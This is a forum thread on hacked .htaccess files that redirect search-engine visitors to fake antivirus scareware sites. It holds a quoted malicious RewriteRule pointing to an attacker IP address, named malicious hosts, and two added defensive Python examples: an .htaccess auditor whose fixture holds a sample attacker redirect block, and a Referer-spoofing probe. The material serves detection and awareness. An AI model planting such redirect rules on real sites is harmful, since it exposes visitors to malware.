Example of an htaccess hack

Doctor Four | There have been quite a few reports of these from time to time in this forum, like the one I encountered for Lover's Pizzeria (which is still quite active as of my post). The Sunbelt Blog has an example of one where, if you visit the site by copying and pasting the URL, it is normal, but if you follow a Google result, you get redirected to a site which tries to get visitors to install Antivirus 2009. The htaccess file has been hacked so that if a referrer is found, a 302 redirect occurs to the malicious site.
»sunbeltblog.blogspot.com/2009/01···ite.html
As for the one I found, I checked it again. Avast blocked professional-virus-scan [dot] com as a malicious site. -- "The trouble with computers, of course, is that they are very sophisticated idiots." - Doctor Who (from Robot)
 | One nice thing about Opera is that it has the option to NOT send referrer information. I would hope that would stop this sort of attack. |
mysec | Yes, if Referrer Logging is unchecked, you will go directly to the legitimate site.
Also, if Referrer is not disabled and you are redirected, if scripting is disabled, the bogus antivirus page loads but nothing happens, because the page calls a .js file to do the dirty work:
<script src='window.js'></script>
The exploit no longer launches from Google, which now intercepts the action:
[screenshot]
_______________________________________________________
However, as of this writing, the exploit works from a Yahoo search page.
---- rich
 | reply to Doctor Four Interesting. I have used search engines to ensure I browse straight to a site whose domain name I am unsure of instead of rolling the dice and possibly going to a squatter/malicious site. It took a minute to figure out why they would do this as it seems it would cut out part of their 'clientèle'. Clever. |
mysec | I've notified many sites that have been affected by this and it always turns out to be a problem with the Hosting service and not the site itself.
If you set your firewall to alert, you can follow the steps.
Here is the IP for offenbachers.com:
[screenshot]
_______________________________________________
First, connection to offenbachers.com:
[screenshot]
_______________________________________________
Then, the re-directs:
[screenshots]
________________________________________________
And finally the rogue antivirus page loads:
[screenshot]
________________________________________________
As Walter Cronkite, former CBS news anchor, used to say, "That's the way it is."
---- rich
norwegian | reply to mysec: said by mysec: "Yes, if Referrer Logging is unchecked, you get the 302 error." Thanks, that is good to know, as it is something I've always turned off in Opera. -- The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
 | reply to Doctor Four Opera is not alone in optionally blocking HTTP referers. This can also be done in Firefox and Seamonkey: In about:config, there is a variable called "network.http.sendRefererHeader" which can be set to zero to prevent sending such headers. The situation can be verified using some of the tests at grc.com. |
 | reply to Doctor Four Very clever. They're probably doing it this way because they've found an exploit in the web servers which allow them to append lines to text files. All it takes is one line added to .htaccess to redirect requests to the rogue site. This also has the added "benefit" of not alerting the owner of the site too quickly as he is likely to visit it via a direct link, without sending referrer information. -- Mischel Internet Security - Developer of TrojanHunter |
norwegian | reply to Doctor Four: They must be looking at more than just this one way, as I remember in this topic I was redirected in Opera with referrer off.
Guess they have a plethora of exploits to work with, and as mentioned, if the web pages you visit are poorly written or not updated, the vector's window becomes ten-fold.
-- The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
mysec | reply to Doctor Four: Informative old blog here:
My Website Got Hacked! »blog.riskythinking.com/2008/11/m···ked.html
It could be titled, "Who is to blame?"
It's evidently the Hosting service, and you can see how an .htaccess file is modified with a Rewrite Rule:
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
________________________________________________________________
Disabling "Automatic Redirect" in your browser, you can watch the exploit from a different perspective. At each alert, I clicked the link to bring up the next one:
[screenshots]
___________________________________________________
Next would be the rogue antivirus site.
---- rich
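An added example, not code from this thread, the riskythinking blog or the Sunbelt post, that audits an .htaccess file for the rule shape quoted just above and described by Doctor Four at the top of the thread: RewriteCond lines keyed on %{HTTP_REFERER} followed by a RewriteRule whose target is a full URL on another host. The sample .htaccess, the search-engine patterns and the target host 192.0.2.10 are constructed for the example (the page only shows the single RewriteRule line); the parsing assumes the common one-directive-per-line layout.

```python
"""Audit an Apache .htaccess for the injected, referrer-keyed redirect this
thread discusses.  Added example, not code from the thread or the blogs it
links.  Apache applies the RewriteCond lines immediately preceding a
RewriteRule to that rule only, so the attacker's block is: one or more
RewriteCond on %{HTTP_REFERER}, then a RewriteRule whose substitution is a
full URL on another host (an absolute URL on a foreign host is an external
redirect whether or not [R] is given)."""
import re
from urllib.parse import urlparse

# Constructed sample .htaccess: the owner's own rules plus an appended attacker
# block modelled on the RewriteRule quoted in the thread.  The target host
# 192.0.2.10 (a documentation address) and the referrer patterns are assumptions.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteBase /
RewriteRule ^old-page\\.html$ /new-page.html [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L]

RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.* [NC]
RewriteRule .* http://192.0.2.10/in.html?s=ix [R,L]
"""

_COND = re.compile(r"^RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
_RULE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def _flags(text):
    """'R=302,L' -> {'R', 'L'}; flag values do not matter to the audit."""
    return {f.split("=")[0].strip().upper() for f in (text or "").split(",") if f.strip()}


def audit_htaccess(text, own_hosts=()):
    """Return findings as (kind, target_url, [referrer patterns]).

    kind == "cloaked": redirect to a foreign host gated on HTTP_REFERER
    kind == "external": unconditional redirect to a foreign host
    """
    own = {h.lower() for h in own_hosts}
    pending = []            # RewriteCond lines waiting for their RewriteRule
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _COND.match(line)
        if m:
            pending.append((m.group(1), m.group(2), _flags(m.group(3))))
            continue
        m = _RULE.match(line)
        if not m:
            continue
        conds, pending = pending, []     # this rule consumes the conditions
        target = m.group(2)
        host = urlparse(target).netloc.lower()
        if not host or host in own:
            continue                     # internal rewrite or same-site redirect
        ref_patterns = [p for v, p, _ in conds if v.upper() == "%{HTTP_REFERER}"]
        kind = "cloaked" if ref_patterns else "external"
        findings.append((kind, target, ref_patterns))
    return findings


if __name__ == "__main__":
    for kind, target, pats in audit_htaccess(SAMPLE_HTACCESS, own_hosts=["www.example.com"]):
        print(f"{kind}: -> {target}  when Referer matches {pats or 'anything'}")
```

Run it over the site's own .htaccess with own_hosts set to the site's hostnames. A "cloaked" finding is exactly the pattern the thread describes; an unconditional "external" redirect to a bare IP address you do not recognise deserves the same look, since the blog's quoted rule has that shape.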
VikingBob | reply to norwegian: Javascript is a very popular method... I wouldn't be surprised if that was used as well. That would explain the popup box you got back then. Lots of ways for the bad guys to do their thing, unfortunately.
mysec | reply to norwegian: said by norwegian: "I remember this topic I was redirected in Opera, referrer off." Well, norwegian, it still redirects!
[screenshot]
---- rich
 | Is it still live?
mysec | Yes
[screenshot]
norwegian | That's hard to believe. That original post was from 9/11/08. And we are worried about moral issues and filtering down under?
So that link is using javascript, as mentioned by VikingBob, as well as the referrer then, if I understand your 2 posts? -- The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
| The .htaccess usually does the redirect, but javascript can do that, too. The popup could be javascript or something else. Examination would be needed; I don't have a machine for playing with to look.
Sophos has a blog entry today on .htaccess attacks: »www.sophos.com/security/blog/200···608.html
norwegian | Who is to know if they have not done anything other than a piccie or email, but the image of the download of AV2009 suggests a spyware is critical, but a trojan is medium? Interesting article though. -- The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
mysec | said by norwegian: "So that link is using javascript as mentioned by VikingBob as well as the referrer then if I understand your 2 posts?" Yes. This is easy to test. It works the same as the offenbachers.com link discussed above.
With Referrer disabled, the legitimate site loads from Yahoo Search:
[screenshot]
____________________________________________________
With Referrer enabled and Javascript disabled, the redirect loads the bogus site but nothing happens.
[screenshot]
____________________________________________________
This is because everything from this point runs via javascript:
[screenshot]
____________________________________________________
I reload with Javascript enabled and the first action is the popup warning:
[screenshot]
__________________________________________________________
Another page, _freescan.html, is cached which downloads other Javascript files and initiates the scan. Here is some of that code. The "fileslist2.js" file, for example, contains the list of "virusses" that supposedly the scanner finds on your system. As the fake scan runs, these files appear in the "now scanning" bar, indicating to the unsuspecting victim that indeed the computer is terribly infected, and to bring that point home, a Warning pops up following the scan:
[screenshots]
_________________________________________________
At this point, no matter what you click, this code will call the download:
[screenshots]
_________________________________________________
If cancel is selected, the user is set in a loop where the download prompt keeps coming back.
Unlike previous exploits, in these the user can easily close the window or the browser. You may remember one where the user had to close the IE process in Task Manager. Even so, in both cases an infection cannot take place until the user selects to Open [Run], or Save and then run the file.
I would like to point out that I've seen that some people do not understand that
OPEN = Download and Run (execute).
SAVE = Download. Nothing executes until the user clicks to run the file after it is downloaded.
Note that the exploit prompts the user to select RUN or OPEN so that the file will execute automatically as soon as it is downloaded.
[screenshot]
_________________________________________________________
I will select SAVE and you can see that the file downloads and just sits there:
[screenshot]
__________________________________________________________
This is to re-emphasize that in this particular exploit, the user must take some action to get the file to download/execute in order to become infected.
However, an earlier Referrer exploit from a year or so ago had a remote code execution component for users with an unpatched IE6, unless something intervened to stop the executable from automatically downloading and executing:
[screenshot]
_______________________________________________
And so it goes...
---- rich
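An added example, not the thread's own code, of the check mysec carries out by hand in the posts above: fetch the URL with no Referer, then with a Google and a Yahoo Referer header, refuse to follow redirects, and report any search-engine referer that yields an off-site 3xx Location the direct request did not. http_fetch is a real urllib implementation for probing a live site; simulated_fetch and its 192.0.2.10 target are constructed to mirror the thread's observations so the example runs offline. One caveat the thread itself raises (norwegian was redirected with referrer off, and the fake-scan pages run entirely in javascript): a redirect performed by script is invisible to this header-only probe, which only catches the .htaccess variant.

```python
"""Probe a site for the search-engine-only redirect traced above: request the
page with no Referer, then with Google and Yahoo Referer headers, never follow
redirects, and compare.  Added example, not code from the thread."""
import urllib.error
import urllib.request
from urllib.parse import urlparse

# Referer values to try; the thread saw Google and Yahoo results being hit.
SEARCH_REFERERS = {
    "google": "https://www.google.com/search?q=example",
    "yahoo": "https://search.yahoo.com/search?p=example",
}
REDIRECT_CODES = {301, 302, 303, 307, 308}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse every redirect so the 3xx and its Location come back to us."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, referer=None, timeout=15):
    """Live fetch: returns (status, Location header or None). Not used offline."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    if referer:
        req.add_header("Referer", referer)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:   # a refused 3xx surfaces here
        return err.code, err.headers.get("Location")


def check_referer_cloaking(url, fetch=http_fetch):
    """Map each search-engine name to the off-site Location it triggers.

    A hit is reported only when the direct request did not already give the
    same redirect, so an honest site-wide move to a new host is not mistaken
    for cloaking.  An empty dict means no referrer-keyed redirect was seen.
    """
    site_host = urlparse(url).netloc.lower()
    direct = fetch(url, None)
    cloaked = {}
    for name, referer in SEARCH_REFERERS.items():
        status, location = fetch(url, referer)
        if status not in REDIRECT_CODES or not location:
            continue
        if urlparse(location).netloc.lower() in ("", site_host):
            continue                      # same-site redirect, e.g. to /index.php
        if (status, location) != direct:
            cloaked[name] = location
    return cloaked


def simulated_fetch(url, referer=None):
    """Constructed stand-in for a compromised host, mirroring the thread's
    observations: 200 when visited directly, 302 off-site when the Referer
    names a search engine.  The target host 192.0.2.10 is an assumption."""
    if referer and any(se in referer for se in ("google.", "yahoo.")):
        return 302, "http://192.0.2.10/in.html?s=ix"
    return 200, None


if __name__ == "__main__":
    # Pass fetch=http_fetch (the default) to probe a live site instead.
    print(check_referer_cloaking("http://www.example.com/", fetch=simulated_fetch))
```

Because redirects are refused, the probe never loads the rogue page itself; it only records where the site tried to send a search-engine visitor, which is what the firewall-alert screenshots in this thread show one hop at a time.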